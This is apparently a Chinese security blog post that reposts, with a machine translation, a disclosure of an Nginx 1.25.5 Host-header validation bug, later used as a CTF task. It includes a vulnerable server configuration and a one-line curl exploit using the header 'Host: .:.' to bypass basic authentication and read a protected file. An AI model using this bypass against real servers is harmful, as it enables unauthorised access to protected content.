机窝安全--Nginx 1.25.5 主机头验证漏洞

Nginx 版本 1.25.5 及更低版本似乎存在主机标头过滤验证错误，可能被用于恶意。

原文：

	# Nginx =< 1.25.5 $host variable validation bug

	## Intro:

	In the "Host" header sent to Nginx web server you can't just insert a dot or something like that, because a filtering rules exists there.

	The ngx_http_validate_host function is responsible for filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).

	## What it validates:

	+ ﻿﻿two dots in a row are not allowed

	+ colon and everything after it are stripped off

	+ ﻿﻿if "Host" header starts with "[", then after "]" everything is deleted

	+ ﻿﻿path separators are not allowed

	+ ﻿﻿cannot send chars ≤ 0x20 and == 0x7f

	+ ﻿﻿if there is a dot at the end, it is removed

	+ ﻿﻿if after all deletions the host length is zero, error occurs

	## The bug itself:

	dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted.

	So, if "Host" header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can't be done in the normal conditions.

	## Vulnerable Nginx server configuration example:

	server {

	 root /sites/$host;

	 index index.html;

	 server_name _;

	 location / {

	 try_files $uri $uri/ =404;

}

}

	server {

	 server_name "";

	 location / {

	 return 418 "I'm a teapot.";

}

}

	server {

	 root /sites/protected-host.example.com;

	 index flag.html;

	 server_name protected-host.example.com;

	 auth_basic "Protected File Storage";

	 auth_basic_user_file /.htpasswd;

	 location / {

	 try_files $uri $uri/ =404;

}

}

	## Exploit (unauthorized access to password-protected host in this case):

	curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html

	P.S.

	The bug was sent to security-alert@nginx.org, but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.

机翻：

#Nginx=<1.25.5$主机变量验证错误

##简介：

在发送到Nginx web服务器的“主机”标题中，你不能只插入一个点或类似的东西，因为那里存在过滤规则。
ngx_http_validate_host函数负责过滤(https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).

##它验证的内容：

+ 不允许一行有两个点
+结肠及其剥离后的一切
+ 如果“Host”标头以“[”开头，则在“]”之后删除所有内容
+ 不允许使用路径分隔符
+ 无法发送字符≤0x20且==0x7f
+ 如果末端有一个点，则将其删除
+ 如果在所有删除之后主机长度为零，则会发生错误

##错误本身：

dot_pos可以大于host_len，如果最后一个点包含在条带中，则不会删除最后一个未拆分的字符（本例中为第一个点）。

因此，如果“Host”标头有效载荷为.：，冒号和后面的点被剥离，但第一个点保持不变，Nginx$主机变量现在只包含一个点字符，这在正常情况下是无法做到的。

##易受攻击的Nginx服务器配置示例：

server {

root /sites/$host;

index index.html;

server_name _;

location / {

try_files $uri $uri/ =404;

}

server {

server_name "";

location / {

return 418 "I'm a teapot.";

}

server {

root /sites/protected-host.example.com;

index flag.html;

server_name protected-host.example.com;

auth_basic "Protected File Storage";

auth_basic_user_file /.htpasswd;

location / {

try_files $uri $uri/ =404;

}

##利用漏洞（在这种情况下，未经授权访问受密码保护的主机）：

curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html

附笔。
错误已发送到security-alert@nginx.org，但Nginx开发团队表示，ngx_http_validate_host函数是一个针对傻瓜的过滤器，而不是一个安全漏洞，因此决定将其作为CTF Tinkoff竞赛的一项任务。

评论

发表评论


顶	踩